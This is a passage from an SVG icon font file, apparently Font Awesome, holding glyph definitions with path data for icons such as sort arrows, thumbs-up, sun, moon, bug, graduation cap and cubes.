c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-192c-8.83691 0 -16 7.16309 -16 16zM224 -16v32c0 8.83691 7.16309 16 16 16h64c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-64c-8.83691 0 -16 7.16309 -16 16zM224 112v32
c0 8.83691 7.16309 16 16 16h128c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-128c-8.83691 0 -16 7.16309 -16 16z" />
    <glyph glyph-name="sort-amount-up" unicode="&#xf161;" 
d="M4.70215 331.314l79.9834 80.002c6.24805 6.24707 16.3838 6.24414 22.6279 0l79.9805 -80.002c10.0703 -10.0703 2.89941 -27.3145 -11.3135 -27.3145h-47.9805v-320c0 -8.83691 -7.16309 -16 -16 -16h-32c-8.83691 0 -16 7.16309 -16 16v320h-47.9844
c-14.2402 0 -21.3623 17.2637 -11.3135 27.3145zM240 352c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h256c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-256zM224 240v32c0 8.83691 7.16309 16 16 16h192
c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-192c-8.83691 0 -16 7.16309 -16 16zM224 -16v32c0 8.83691 7.16309 16 16 16h64c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-64c-8.83691 0 -16 7.16309 -16 16zM224 112v32
c0 8.83691 7.16309 16 16 16h128c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-128c-8.83691 0 -16 7.16309 -16 16z" />
    <glyph glyph-name="sort-numeric-down" unicode="&#xf162;" horiz-adv-x="425" 
d="M308.811 334.213l-19.4473 20.7949c-4.52246 4.83594 -4.27441 12.4209 0.555664 16.9502l43.4434 40.7412c1.91113 1.79199 5.58789 3.24707 8.20801 3.24707h0.000976562h31.5908c6.62695 0 12 -5.37305 12 -12v-127.07h25.6602c6.62695 0 12 -5.37305 12 -12v-28.9297
c0 -6.62695 -5.37305 -12 -12 -12h-109.173c-6.62695 0 -12 5.37305 -12 12v28.9297c0 6.62695 5.37305 12 12 12h25.4141v57.9385c-7.25488 -6.58008 -14.2119 -4.92188 -18.2529 -0.601562zM278.241 95.6436c0 32.6533 23.8652 67.3564 68.0938 67.3564
c38.2529 0 79.4238 -28.8613 79.4238 -92.2275c0 -51.2764 -32.2363 -105.772 -91.9824 -105.772c-17.8359 0 -30.5459 3.55664 -38.5488 6.78125c-5.78906 2.33301 -8.78809 8.74609 -6.92188 14.7031l9.2373 29.4795c2.03516 6.49609 9.04883 9.9834 15.4668 7.71582
c13.0293 -4.60156 27.8779 -5.27441 38.1035 4.13867c-38.7422 -5.07227 -72.8721 25.3594 -72.8721 67.8252zM370.514 76.3057c0 22.2852 -15.3018 36.5049 -25.835 36.5049c-8.6416 0 -13.1641 -7.96484 -13.1641 -15.832c0 -5.66895 1.81543 -24.168 25.168 -24.168
c9.97363 0 13.377 2.1543 13.7441 2.73145c0.0214844 0.0458984 0.0869141 0.291016 0.0869141 0.763672zM175.984 80c14.2402 0 21.3623 -17.2637 11.3125 -27.3145l-79.9834 -80.002c-6.24707 -6.24707 -16.3828 -6.24414 -22.6279 0l-79.9805 80.002
c-10.0703 10.0703 -2.89844 27.3145 11.3135 27.3145h47.9814v320c0 8.83691 7.16309 16 16 16h32c8.83691 0 16 -7.16309 16 -16v-320h47.9844z" />
    <glyph glyph-name="sort-numeric-up" unicode="&#xf163;" horiz-adv-x="425" 
d="M308.811 334.213l-19.4473 20.7949c-4.52246 4.83594 -4.27441 12.4209 0.555664 16.9502l43.4434 40.7412c1.91113 1.79199 5.58789 3.24707 8.20801 3.24707h0.000976562h31.5908c6.62695 0 12 -5.37305 12 -12v-127.07h25.6602c6.62695 0 12 -5.37305 12 -12v-28.9297
c0 -6.62695 -5.37305 -12 -12 -12h-109.173c-6.62695 0 -12 5.37305 -12 12v28.9297c0 6.62695 5.37305 12 12 12h25.4141v57.9385c-7.25488 -6.58008 -14.2119 -4.92188 -18.2529 -0.601562zM278.241 95.6436c0 32.6533 23.8652 67.3564 68.0938 67.3564
c38.2529 0 79.4238 -28.8613 79.4238 -92.2275c0 -51.2764 -32.2363 -105.772 -91.9824 -105.772c-17.8359 0 -30.5459 3.55664 -38.5488 6.78125c-5.78906 2.33301 -8.78809 8.74609 -6.92188 14.7031l9.2373 29.4795c2.03516 6.49609 9.04883 9.9834 15.4668 7.71582
c13.0293 -4.60156 27.8779 -5.27441 38.1035 4.13867c-38.7422 -5.07227 -72.8721 25.3594 -72.8721 67.8252zM370.514 76.3057c0 22.2852 -15.3018 36.5049 -25.835 36.5049c-8.6416 0 -13.1641 -7.96484 -13.1641 -15.832c0 -5.66895 1.81543 -24.168 25.168 -24.168
c9.97363 0 13.377 2.1543 13.7441 2.73145c0.0214844 0.0458984 0.0869141 0.291016 0.0869141 0.763672zM16.0156 304c-14.2402 0 -21.3623 17.2637 -11.3135 27.3145l79.9844 80.002c6.24707 6.24707 16.3828 6.24414 22.6279 0l79.9805 -80.002
c10.0703 -10.0703 2.89844 -27.3145 -11.3135 -27.3145h-47.9814v-320c0 -8.83691 -7.16309 -16 -16 -16h-32c-8.83691 0 -16 7.16309 -16 16v320h-47.9844z" />
    <glyph glyph-name="thumbs-up" unicode="&#xf164;" horiz-adv-x="511" 
d="M104 224c13.2549 0 24 -10.7451 24 -24v-240c0 -13.2549 -10.7451 -24 -24 -24h-80c-13.2549 0 -24 10.7451 -24 24v240c0 13.2549 10.7451 24 24 24h80zM64 -24c13.2549 0 24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24zM384 366.548
c0 -42.416 -25.9697 -66.208 -33.2773 -94.5479h101.724c33.3965 0 59.3965 -27.7461 59.5527 -58.0977c0.0839844 -17.9385 -7.5459 -37.249 -19.4395 -49.1973l-0.109375 -0.110352c9.83594 -23.3369 8.23633 -56.0371 -9.30859 -79.4688
c8.68164 -25.8945 -0.0683594 -57.7041 -16.3818 -74.7568c4.29785 -17.5977 2.24414 -32.5752 -6.14746 -44.6318c-20.4102 -29.3242 -70.9961 -29.7373 -113.773 -29.7373l-2.84473 0.000976562c-48.2871 0.0166016 -87.8057 17.5977 -119.561 31.7246
c-15.957 7.09961 -36.8203 15.8877 -52.6504 16.1787c-6.54004 0.120117 -11.7832 5.45703 -11.7832 11.998v213.77c0 3.2002 1.28223 6.27148 3.55762 8.52148c39.6143 39.1436 56.6484 80.5869 89.1172 113.11c14.8037 14.832 20.1885 37.2363 25.3936 58.9023
c4.44629 18.501 13.749 57.7939 33.9316 57.7939c24 0 72 -8 72 -81.4521z" />
    <glyph glyph-name="thumbs-down" unicode="&#xf165;" 
d="M0 392c0 13.2549 10.7451 24 24 24h80c13.2549 0 24 -10.7451 24 -24v-240c0 -13.2549 -10.7451 -24 -24 -24h-80c-13.2549 0 -24 10.7451 -24 24v240zM40 192c0 -13.2549 10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24zM312 -64
c-20.1826 0 -29.4854 39.293 -33.9307 57.7949c-5.20605 21.666 -10.5889 44.0703 -25.3936 58.9023c-32.4688 32.5234 -49.5029 73.9668 -89.1172 113.11c-1.96387 1.94141 -3.55762 5.75879 -3.55762 8.52051v0.000976562v213.77
c0 6.54102 5.24316 11.8779 11.7832 11.998c15.8311 0.290039 36.6934 9.0791 52.6504 16.1787c31.7549 14.127 71.2744 31.708 119.561 31.7246h2.84375c42.7773 0 93.3633 -0.413086 113.774 -29.7373c8.3916 -12.0566 10.4453 -27.0342 6.14746 -44.6318
c16.3125 -17.0527 25.0635 -48.8633 16.3818 -74.7568c17.5439 -23.4316 19.1436 -56.1318 9.30859 -79.4688l0.109375 -0.110352c11.8936 -11.9492 19.5234 -31.2588 19.4395 -49.1973c-0.15625 -30.3516 -26.1572 -58.0977 -59.5527 -58.0977h-101.725
c7.30762 -28.3398 33.2773 -52.1318 33.2773 -94.5479c0 -73.4521 -48 -81.4521 -72 -81.4521z" />
    <glyph glyph-name="female" unicode="&#xf182;" horiz-adv-x="256" 
d="M128 448c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64zM247.283 93.8213c3.78809 -15.1504 -7.69238 -29.8213 -23.2832 -29.8213h-56v-104c0 -13.2549 -10.7451 -24 -24 -24h-32c-13.2549 0 -24 10.7451 -24 24v104h-56
c-15.6172 0 -27.0654 14.6953 -23.2832 29.8213l48 192c2.50879 10.0342 12.9395 18.1787 23.2832 18.1787h11.3604c23.6895 -10.8936 50.5684 -10.4434 73.2793 0h11.3604c10.3438 0 20.7744 -8.14453 23.2832 -18.1787z" />
    <glyph glyph-name="male" unicode="&#xf183;" horiz-adv-x="192" 
d="M96 448c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64zM144 304c26.5098 0 48 -21.4902 48 -48v-136c0 -13.2549 -10.7451 -24 -24 -24h-16v-136c0 -13.2549 -10.7451 -24 -24 -24h-64c-13.2549 0 -24 10.7451 -24 24v136h-16
c-13.2549 0 -24 10.7451 -24 24v136c0 26.5098 21.4902 48 48 48h11.3604c23.6895 -10.8936 50.5684 -10.4434 73.2793 0h11.3604z" />
    <glyph glyph-name="sun" unicode="&#xf185;" horiz-adv-x="511" 
d="M256 288c52.9004 0 96 -43.0996 96 -96s-43.0996 -96 -96 -96s-96 43.0996 -96 96s43.0996 96 96 96zM502.4 207.5c12.7998 -6.40039 12.7998 -24.5996 -0.200195 -31.0996l-94.7002 -47.3008l33.5 -100.399c4.59961 -13.5 -8.2998 -26.4004 -21.9004 -21.9004
l-100.399 33.5l-47.2998 -94.7002c-6.40039 -12.7998 -24.6006 -12.7998 -31 0l-47.3008 94.7002l-100.399 -33.5c-13.5 -4.59961 -26.4004 8.2998 -21.9004 21.9004l33.5 100.5l-94.7002 47.2998c-12.7998 6.40039 -12.7998 24.5996 0 31l94.7002 47.4004l-33.5 100.399
c-4.59961 13.5 8.2998 26.4004 21.9004 21.9004l100.5 -33.5l47.2998 94.7002c6.40039 12.7998 24.5996 12.7998 31 0l47.4004 -94.8008l100.399 33.5c13.5 4.60059 26.4004 -8.2998 21.9004 -21.8994l-33.5 -100.4zM346.5 101.5c49.9004 49.9004 49.9004 131.1 0 181
s-131.1 49.9004 -181 0s-49.9004 -131.1 0 -181s131.1 -49.9004 181 0z" />
    <glyph glyph-name="moon" unicode="&#xf186;" 
d="M283.211 -64c-141.489 0 -256 114.691 -256 256c0 141.489 114.691 256 256 256c13.0176 -0.00195312 33.9727 -1.91895 46.7754 -4.28027c11.0059 -2.0332 13.4414 -16.7178 3.75586 -22.2295c-62.8359 -35.7588 -101.498 -102.172 -101.498 -174.395
c0 -125.378 114.059 -220.607 238.262 -196.954c10.9229 2.08008 18.6299 -10.6416 11.5625 -19.3496c-47.7783 -58.8672 -119.896 -94.792 -198.857 -94.792z" />
    <glyph glyph-name="archive" unicode="&#xf187;" 
d="M32 0v288h448v-288c0 -17.7002 -14.2998 -32 -32 -32h-384c-17.7002 0 -32 14.2998 -32 32zM192 212v-8c0 -6.59961 5.40039 -12 12 -12h104c6.59961 0 12 5.40039 12 12v8c0 6.59961 -5.40039 12 -12 12h-104c-6.59961 0 -12 -5.40039 -12 -12zM480 416
c17.7002 0 32 -14.2998 32 -32v-48c0 -8.7998 -7.2002 -16 -16 -16h-480c-8.7998 0 -16 7.2002 -16 16v48c0 17.7002 14.2998 32 32 32h448z" />
    <glyph glyph-name="bug" unicode="&#xf188;" 
d="M511.988 159.1c-0.478516 -17.4297 -15.2168 -31.0996 -32.6533 -31.0996h-55.335v-16c0 -21.8643 -4.88184 -42.584 -13.5996 -61.1445l60.2275 -60.2285c12.4961 -12.4971 12.4961 -32.7578 0 -45.2549c-12.498 -12.4971 -32.7588 -12.4961 -45.2559 0
l-54.7363 54.7363c-24.75 -20.0732 -56.2852 -32.1084 -90.6357 -32.1084v244c0 6.62695 -5.37305 12 -12 12h-24c-6.62695 0 -12 -5.37305 -12 -12v-244c-34.3506 0 -65.8857 12.0352 -90.6357 32.1084l-54.7363 -54.7363c-12.498 -12.4971 -32.7588 -12.4961 -45.2559 0
c-12.4961 12.4971 -12.4961 32.7578 0 45.2549l60.2275 60.2285c-8.71777 18.5605 -13.5996 39.2803 -13.5996 61.1445v16h-55.334c-17.4355 0 -32.1748 13.6699 -32.6533 31.0996c-0.49707 18.084 14.0156 32.9004 31.9873 32.9004h56v58.7451l-46.6279 46.6279
c-12.4961 12.4971 -12.4961 32.7578 0 45.2549c12.498 12.4971 32.7578 12.4971 45.2559 0l54.627 -54.6279h229.489l54.627 54.627c12.498 12.4971 32.7578 12.4971 45.2559 0c12.4961 -12.4971 12.4961 -32.7578 0 -45.2549l-46.627 -46.627v-58.7451h56
c17.9717 0 32.4844 -14.8164 31.9883 -32.9004zM257 448c61.8564 0 112 -50.1436 112 -112h-224c0 61.8564 50.1436 112 112 112z" />
    <glyph glyph-name="caret-square-left" unicode="&#xf191;" horiz-adv-x="448" 
d="M400 -32h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48zM259.515 323.515l-123.029 -123.029c-4.68652 -4.68652 -4.68652 -12.2842 0 -16.9717l123.028 -123.028
c7.56055 -7.56055 20.4854 -2.20605 20.4854 8.48438v246.06c0.000976562 10.6904 -12.9248 16.0449 -20.4844 8.48535z" />
    <glyph glyph-name="dot-circle" unicode="&#xf192;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM336 192c0 44.1123 -35.8877 80 -80 80s-80 -35.8877 -80 -80s35.8877 -80 80 -80s80 35.8877 80 80z" />
    <glyph glyph-name="wheelchair" unicode="&#xf193;" 
d="M496.101 62.3311l14.2275 -28.6631c3.92871 -7.91504 0.697266 -17.5156 -7.21777 -21.4453l-65.4658 -32.8857c-16.0488 -7.9668 -35.5557 -1.19434 -43.1885 15.0547l-62.7773 133.608h-139.679c-15.9248 0 -29.4258 11.71 -31.6787 27.4746
c-33.8887 237.218 -31.9414 222.481 -32.3213 228.525c0 36.3584 30.3184 65.6348 67.0518 63.9287c33.2715 -1.54492 60.0479 -28.9043 60.9248 -62.2012c0.868164 -32.9326 -23.1514 -60.4229 -54.6074 -65.0381l4.66992 -32.6904h129.961c8.83691 0 16 -7.16309 16 -16
v-32c0 -8.83691 -7.16309 -16 -16 -16h-120.818l4.57227 -32h132.246c11.2168 0 24.1924 -8.24023 28.9619 -18.3916l57.5146 -122.407l36.1787 18.3486c7.91504 3.92871 17.5166 0.697266 21.4453 -7.21777zM311.358 96l25.752 -54.8076
c-27.3047 -61.8848 -89.2402 -105.192 -161.11 -105.192c-97.0469 0 -176 78.9531 -176 176c0 74.0371 45.9561 137.536 110.836 163.489c2.64453 -18.4736 5.77637 -40.3682 9.48828 -66.333c-33.6299 -19.3477 -56.3242 -55.6514 -56.3242 -97.1562
c0 -61.7568 50.2432 -112 112 -112c56.3242 0 103.064 41.7959 110.852 96h24.5068z" />
    <glyph glyph-name="lira-sign" unicode="&#xf195;" horiz-adv-x="384" 
d="M371.994 192c6.78613 0 12.2578 -5.62598 11.9971 -12.4082c-5.15332 -133.758 -94.3174 -211.592 -228.408 -211.592h-79.583c-6.62695 0 -12 5.37305 -12 12v193.442l-49.3975 -10.9775c-7.49316 -1.66602 -14.6025 4.03711 -14.6025 11.7139v40.9766
c0 5.31348 4.20996 10.5615 9.39746 11.7139l54.6025 12.1338v30.4395l-49.3975 -10.9775c-7.49316 -1.66602 -14.6025 4.03711 -14.6025 11.7139v40.9766c0 5.31348 4.20996 10.5615 9.39746 11.7139l54.6025 12.1338v68.9971c0 6.62695 5.37305 12 12 12h56
c6.62695 0 12 -5.37305 12 -12v-51.2188l129.397 28.7539c7.49316 1.66602 14.6025 -4.03711 14.6025 -11.7139v-40.9756c0 -5.31348 -4.20996 -10.5615 -9.39746 -11.7139l-134.603 -29.9121v-30.4385l129.397 28.7539c7.49316 1.66602 14.6025 -4.03711 14.6025 -11.7139
v-40.9766c0 -5.31348 -4.20996 -10.5615 -9.39746 -11.7139l-134.603 -29.9121v-159.219c86.1787 0 168 48 168 148.754c0 6.33398 5.63965 11.2461 11.9746 11.2461h48.0195z" />
    <glyph glyph-name="space-shuttle" unicode="&#xf197;" horiz-adv-x="640" 
d="M592.604 239.756c29.6787 -13.9111 47.3965 -31.7637 47.3965 -47.7559s-17.7178 -33.8447 -47.3965 -47.7559c-32.8682 -15.4082 -76.8262 -24.2441 -120.604 -24.2441h-285.674c-4.95215 -6.55469 -10.585 -11.9775 -16.7197 -16h206.394
c-146.843 -30.2529 -156.597 -136 -279.997 -136h-0.00292969v128h-16v-128c-26.5098 0 -48 28.6543 -48 64v64c-23.1807 0 -32 10.0166 -32 24v40c0 13.9678 8.80273 24 32 24v16c-23.1807 0 -32 10.0166 -32 24v40c0 13.9678 8.80273 24 32 24v64
c0 35.3457 21.4902 64 48 64v-128h16v128h0.00292969c123.4 0 133.154 -105.747 279.997 -136h-206.393c6.13477 -4.02246 11.7676 -9.44531 16.7197 -16h285.673c43.7773 0 87.7354 -8.83594 120.604 -24.2441zM488 152c31.9424 0 31.9092 80 0 80
c-4.41602 0 -8 -3.58398 -8 -8v-64c0 -4.41602 3.58398 -8 8 -8z" />
    <glyph glyph-name="envelope-square" unicode="&#xf199;" horiz-adv-x="448" 
d="M400 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352zM178.117 185.896c10.5156 -7.66895 31.3799 -26.1133 45.8828 -25.8955
c14.4912 -0.225586 35.3828 18.2393 45.8828 25.8936c90.6836 65.8145 89.7461 65.9697 114.117 84.9385v25.167c0 13.2549 -10.7451 24 -24 24h-272c-13.2549 0 -24 -10.7451 -24 -24v-25.167c24.3525 -18.9541 23.4287 -19.1201 114.117 -84.9365zM384 230.225
c-13.958 -10.793 -33.3252 -25.2334 -95.2832 -70.1982c-13.6826 -9.98438 -37.833 -32.1592 -64.7197 -32.0254c-26.7188 -0.134766 -50.5322 21.6689 -64.6943 32.0098c-61.9736 44.9785 -81.3447 59.4199 -95.3027 70.2139v-142.225c0 -13.2549 10.7451 -24 24 -24h272
c13.2549 0 24 10.7451 24 24v142.225z" />
    <glyph glyph-name="university" unicode="&#xf19c;" 
d="M496 320v-16c0 -4.41602 -3.58398 -8 -8 -8h-24v-12c0 -6.62695 -5.37305 -12 -12 -12h-392c-6.62695 0 -12 5.37305 -12 12v12h-24c-4.41602 0 -8 3.58398 -8 8v16c0 2.95215 2.21387 6.26367 4.94141 7.3916l232 88
c0.810547 0.335938 2.18066 0.608398 3.05859 0.608398s2.24805 -0.272461 3.05859 -0.608398l232 -88c2.72754 -1.12793 4.94141 -4.43945 4.94141 -7.3916zM472 16c13.2549 0 24 -10.7451 24 -24v-16c0 -4.41602 -3.58398 -8 -8 -8h-464c-4.41602 0 -8 3.58398 -8 8v16
c0 13.2549 10.7451 24 24 24h432zM96 256h64v-192h64v192h64v-192h64v192h64v-192h36c6.62695 0 12 -5.37305 12 -12v-20h-416v20c0 6.62695 5.37305 12 12 12h36v192z" />
    <glyph glyph-name="graduation-cap" unicode="&#xf19d;" horiz-adv-x="640" 
d="M622.34 294.8c23.5498 -7.24023 23.5498 -38.3594 0 -45.5996l-278.95 -85.7002c-20.3496 -6.25 -37.7295 -2.78027 -46.79 0l-195.569 60.0898c-12.25 -8.41992 -19.9307 -21.7002 -20.6904 -36.7197c9.19043 -5.62012 15.6602 -15.2998 15.6602 -26.8701
c0 -10.7803 -5.67969 -19.8496 -13.8604 -25.6504l25.5303 -114.88c2.21973 -9.98926 -5.37988 -19.4697 -15.6201 -19.4697h-56.1094c-10.2305 0 -17.8301 9.48047 -15.6104 19.4697l25.5303 114.88c-8.18066 5.80078 -13.8604 14.8701 -13.8604 25.6504
c0 11.8896 6.78027 21.8496 16.4102 27.3701c0.649414 17.6201 7.20996 33.71 17.8799 46.8994l-48.6299 14.9404c-23.54 7.23047 -23.54 38.3604 0 45.5898l278.95 85.7002c15.1895 4.66992 31.5898 4.66992 46.79 0zM352.79 132.91l145.03 44.5596l14.1797 -113.47
c0 -35.3496 -85.96 -64 -192 -64s-192 28.6504 -192 64l14.1797 113.46l145.021 -44.5498c12.75 -3.91992 37.0596 -8.75977 65.5898 0z" />
    <glyph glyph-name="language" unicode="&#xf1ab;" horiz-adv-x="640" 
d="M152.1 211.8l10.9004 -37.5h-38.0996l11.0996 37.5c3.5 12.1006 7.7998 33.2002 7.7998 33.2002h0.5s4.2998 -21.0996 7.7998 -33.2002zM616 352c13.2998 0 24 -10.7002 24 -24v-272c0 -13.2998 -10.7002 -24 -24 -24h-280v320h280zM592 232v16
c0 6.59961 -5.40039 12 -12 12h-64v16c0 6.59961 -5.40039 12 -12 12h-16c-6.59961 0 -12 -5.40039 -12 -12v-16h-64c-6.59961 0 -12 -5.40039 -12 -12v-16c0 -6.59961 5.40039 -12 12 -12h114.3c-6.2002 -14.2998 -16.5 -29 -30 -43.2002
c-6.59961 6.90039 -12.3994 13.9004 -17.3994 20.9004c-3.60059 5.09961 -10.6006 6.59961 -16 3.39941l-7.30078 -4.2998l-6.5 -3.89941c-5.89941 -3.5 -7.69922 -11.4004 -3.69922 -17.1006c6.09961 -8.7002 13.0996 -17.2998 21 -25.7002
c-8.10059 -6.2998 -16.8008 -12.2998 -26.1006 -18c-5.59961 -3.39941 -7.39941 -10.5996 -4.2002 -16.1992l7.90039 -13.9004c3.40039 -5.90039 10.9004 -7.7998 16.7002 -4.2998c12.7002 7.7998 24.5 16.2002 35.3994 24.8994
c10.9004 -8.7998 22.8008 -17.0996 35.4004 -24.8994c5.7998 -3.5 13.2998 -1.60059 16.7002 4.2998l7.89941 13.9004c3.2002 5.69922 1.40039 12.7998 -4.09961 16.1992c-9 5.5 -17.7002 11.6006 -26.0996 18c21 22.5 35.7998 46.3008 42.6992 69.9004h11.4004
c6.59961 0 12 5.40039 12 12zM0 328c0 13.2998 10.7002 24 24 24h280v-320h-280c-13.2998 0 -24 10.7002 -24 24v272zM58.9004 111.9c-2.60059 -7.80078 3.19922 -15.9004 11.3994 -15.9004h22.9004c5.2998 0 10 3.59961 11.5 8.7002l9.09961 31.7998h60.2002
l9.40039 -31.9004c1.40137 -4.74316 6.55273 -8.59668 11.5 -8.59961h22.8994c8.2998 0 14 8.09961 11.4004 15.9004l-57.5 169.1c-1.7002 4.7998 -6.2998 8.09961 -11.4004 8.09961h-32.5c-5.2002 0 -9.7002 -3.19922 -11.3994 -8.09961z" />
    <glyph glyph-name="fax" unicode="&#xf1ac;" 
d="M64 320c17.6699 0 32 -14.3301 32 -32v-320c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v320c0 17.6699 14.3301 32 32 32h32zM480 288c17.6699 0 32 -14.3301 32 -32v-288c0 -17.6699 -14.3301 -32 -32 -32h-320c-17.6699 0 -32 14.3301 -32 32
v448c0 17.6699 14.3301 32 32 32h242.74c8.49023 0 16.6299 -3.37012 22.6299 -9.37012l45.2598 -45.25c6 -6.00977 9.37012 -14.1396 9.37012 -22.6299v-82.75zM288 16v32c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-32
c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16zM288 144v32c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16zM416 16v32c0 8.83984 -7.16016 16 -16 16h-32
c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16zM416 144v32c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16zM432 256v96h-32
c-8.83984 0 -16 7.16016 -16 16v32h-208v-144h256z" />
    <glyph glyph-name="building" unicode="&#xf1ad;" horiz-adv-x="448" 
d="M436 -32c6.62695 0 12 -5.37305 12 -12v-20h-448v20c0 6.62695 5.37305 12 12 12h20v456c0 13.2549 10.7451 24 24 24h336c13.2549 0 24 -10.7451 24 -24v-456h20zM128 372v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12v40
c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12zM128 276v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12zM180 128c6.62695 0 12 5.37305 12 12v40
c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40zM256 -32v84c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-84h64zM320 140v40c0 6.62695 -5.37305 12 -12 12h-40
c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM320 236v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM320 332v40
c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12z" />
    <glyph glyph-name="child" unicode="&#xf1ae;" horiz-adv-x="384" 
d="M120 376c0 39.7646 32.2354 72 72 72s72 -32.2354 72 -72c0 -39.7637 -32.2354 -72 -72 -72s-72 32.2363 -72 72zM374.627 374.627c12.4971 -12.4971 12.4971 -32.7568 0 -45.2539l-94.627 -94.627v-266.746c0 -17.6729 -14.3271 -32 -32 -32h-16
c-17.6729 0 -32 14.3271 -32 32v112h-16v-112c0 -17.6729 -14.3271 -32 -32 -32h-16c-17.6729 0 -32 14.3271 -32 32v266.746l-94.627 94.626c-12.4971 12.4971 -12.4971 32.7578 0 45.2549c12.4961 12.4971 32.7578 12.4971 45.2539 0l86.627 -86.627h101.491
l86.6279 86.627c12.4961 12.4971 32.7578 12.4971 45.2539 0z" />
    <glyph glyph-name="paw" unicode="&#xf1b0;" 
d="M256 224c79.4102 0 192 -122.76 192 -200.25c0 -34.9004 -26.8096 -55.75 -71.7402 -55.75c-48.4102 0 -80.75 25.0801 -120.26 25.0801c-39.1699 0 -71.4199 -25.0801 -120.26 -25.0801c-44.9307 0 -71.7402 20.8496 -71.7402 55.75c0 77.4902 112.59 200.25 192 200.25
zM108.72 236.61c10.4004 -34.6504 -4.76953 -68.3799 -33.8896 -75.3408c-29.1201 -6.95996 -61.1602 15.4805 -71.5605 50.1309c-10.3994 34.6494 4.77051 68.3799 33.8906 75.3398s61.1602 -15.4805 71.5596 -50.1299zM193.44 257.39
c-30.9307 -8.14941 -65.6201 20.4502 -77.46 63.8701c-11.8408 43.4199 3.63965 85.2207 34.5791 93.3604c30.9404 8.13965 65.6201 -20.4502 77.46 -63.8701c11.8408 -43.4199 -3.63965 -85.2197 -34.5791 -93.3604zM474.83 286.73
c29.1201 -6.96094 44.29 -40.6904 33.8896 -75.3408c-10.4102 -34.6494 -42.4395 -57.0898 -71.5596 -50.1299s-44.29 40.6904 -33.8906 75.3398c10.4102 34.6504 42.4404 57.0908 71.5605 50.1309zM318.56 257.39c-30.9395 8.14062 -46.4199 49.9404 -34.5791 93.3604
c11.8398 43.4199 46.5195 72.0195 77.46 63.8701c30.9395 -8.15039 46.4199 -49.9404 34.5791 -93.3604c-11.8398 -43.4199 -46.5195 -72.0098 -77.46 -63.8701z" />
    <glyph glyph-name="cube" unicode="&#xf1b2;" horiz-adv-x="511" 
d="M239.1 441.7c10.9004 4.09961 22.9004 4.09961 33.7002 -0.100586l208 -78c18.7002 -7 31.1006 -24.8994 31.1006 -44.8994v-225.101c0 -18.0996 -10.2002 -34.7998 -26.5 -42.8994l-208 -104c-13.5 -6.7998 -29.4004 -6.7998 -42.9004 0l-208 104
c-16.2002 8.09961 -26.5 24.7002 -26.5 42.8994v225.101c0 20 12.4004 38 31.0996 45zM256 379.6l-192 -72v-1.09961l192 -78l192 78v1.09961zM288 23.5996l160 80v133.9l-160 -65v-148.9z" />
    <glyph glyph-name="cubes" unicode="&#xf1b3;" 
d="M488.6 197.8c14.1006 -5.2998 23.4004 -18.7002 23.4004 -33.7002v-110.1c0 -13.5996 -7.7002 -26.0996 -19.9004 -32.2002l-100 -50c-10.0996 -5.09961 -22.0996 -5.09961 -32.1992 0l-103.9 52l-103.9 -52c-10.0996 -5.09961 -22.0996 -5.09961 -32.1992 0l-100 50
c-12.2002 6.10059 -19.9004 18.6006 -19.9004 32.2002v110.1c0 15 9.2998 28.4004 23.2998 33.7002l96.6006 36.2002v108.5c0 15 9.2998 28.4004 23.3994 33.7002l100 37.5c8.2002 3.09961 17.2002 3.09961 25.2998 0l100 -37.5
